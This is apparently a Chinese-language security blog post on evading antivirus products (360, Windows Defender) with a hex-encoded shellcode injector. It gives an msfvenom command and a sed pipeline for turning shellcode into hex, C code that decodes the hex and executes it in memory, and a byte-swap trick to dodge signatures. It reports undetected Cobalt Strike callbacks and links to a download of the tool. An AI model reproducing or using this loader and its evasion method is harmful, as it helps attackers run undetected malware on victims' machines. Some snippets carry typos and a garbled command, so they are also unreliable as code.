反转字符串绕杀软

  • A+
所属分类:安全文章


github有一个ssi的项目,项目地址如下:https://github.com/DimopoulosElias/SimpleShellcodeInjector/ 他可以实现shellcode的远程加载(十六进制),当然LDrakura也曾经搞过类似的项目(我偷电瓶车养你啊),当时还是一次项目时绕卡巴斯基的时候他丢我的。本文将简单介绍该项目的原理,并给出其他实现方法。



shellcode处理


首先需要处理shellcode,这里推荐使用kali直接处理,推荐下面的两种方法。

cat 1.txt | grep -v unsigned|sed "s/"\x//g"|sed "s/\x//g"|sed "s/"//g"|sed ':a;N;$!ba;s/n//g'|sed "s/;//g"


反转字符串绕杀软


或者

msfvenom -p windows/exec CMD=calc.exe -f raw | xxd -ps


反转字符串绕杀软


cs的shellcode推荐第二种,如果是第一种,需要做一些调整操作,像下面这样:


反转字符串绕杀软


加载原理


加载器通过参数的方式传递hex的shellcode到加载器内,然后使用一些操作还原shellcode,这里有一些需要注意的点,比如数组的长度为1066,那么他就是由shellcode[0]=f到shellcode[1665]=7构成后面加上一个终止符,此时strlen(shellcode)=1666,sizeof(shellcode)=1667,所以在计算长度时便需要这样  x=(sizeof(shellcode) - 1) . or x= strlen(shellcode),因为每两个字节为一组,所以我们在分配内存时,需要进行除二操作,比如bytes = (sizeof(shellcode) - 1)/2  或者 bytes = strlen(shellcode)/2。


接下来便是还原shellcode的操作了


for(unsigned int i = 0; i< iterations-1; i++) {        sscanf(shellcode+2*i, "%2X", &char_in_hex);        shellcode[i] = (char)char_in_hex;    }



或者使用下面这样的方法:


void AsciiToHex(char * pAscii, unsigned char * pHex, int nLen) {   if (nLen % 2)             return;       int nHexLen = nLen / 2;       for (int i = 0; i < nHexLen; i++)       {             unsigned char Nibble[2];             Nibble[0] = *pAscii++;             Nibble[1] = *pAscii++;             for (int j = 0; j < 2; j++)             {                   if (Nibble[j] <= 'F' && Nibble[j] >= 'A')                         Nibble[j] = Nibble[j] - 'A' + 10;                   else if (Nibble[j] <= 'f' && Nibble[j] >= 'a')                         Nibble[j] = Nibble[j] - 'a' + 10;                   else if (Nibble[j] >= '0' && Nibble[j] <= '9')                         Nibble[j] = Nibble[j] - '0';                   else                         return;            }   // for (int j = ...)             pHex[i] = Nibble[0] << 4;   // Set the high nibble             pHex[i] |= Nibble[1];   //Set the low nibble       }   // for (int i = ...) }

然后剩下的便是分配内存、装入shellcode,作者使用的是


(*(void (*)()) exec)();


来进行最后的加载。


测试


明白原理之后,重新编译(原文件md5可能已被标记),使用360全家桶进行扫描:


反转字符串绕杀软


联网情况下是没有任何问题的,然后上线我们的cs试试:


反转字符串绕杀软


可直接上线,注:x64的shellcode上线有问题,程序会崩溃。


修改


更改shellcode前几个字节,然后加载到内存更改回来,然后解密hex加载,并更改shellcode加载方式。


更改加载的方法之前也是发过的。


反转方式如下:


char first[] = "xfc";memcpy(shellcode,fisrt,1);


加载方式如下:


typedef void (*some_func)();   some_func func = (some_func)exec;   func();


ps:只是更改了一个写法。


测试弹出计算器:


反转字符串绕杀软


windows defender上线测试:


反转字符串绕杀软


反转字符串绕杀软


总结:


cs生成的shellcode过长,可想直接写入程序,程序下载地址:

https://github.com/lengjibo/RedTeamTools/tree/master/windows/SSI


欢迎star



发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: